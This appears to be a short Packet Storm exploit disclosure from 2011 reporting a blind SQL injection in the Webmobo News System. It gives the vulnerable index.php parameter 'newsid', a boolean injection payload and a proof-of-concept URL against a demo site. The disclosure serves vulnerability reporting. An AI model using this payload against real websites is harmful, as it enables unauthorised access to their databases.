Webmodo News System SQL Injection

2011-09-05T00:00:00
ID PACKETSTORM:104795
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-05T00:00:00

Description

                                        
                                            `# Exploit Title: Webmobo News System Blind SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
Blind SQL Injection can be done using the command input  
  
Vulnerable Page:  
index.php  
  
Example:  
index.php?action=sendto&newsid=<Blind SQL Injection Code>  
  
Exploit:  
index.php?action=sendto&newsid=1' and '2'='2  
  
POC:  
http://demo.webmobo.com/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`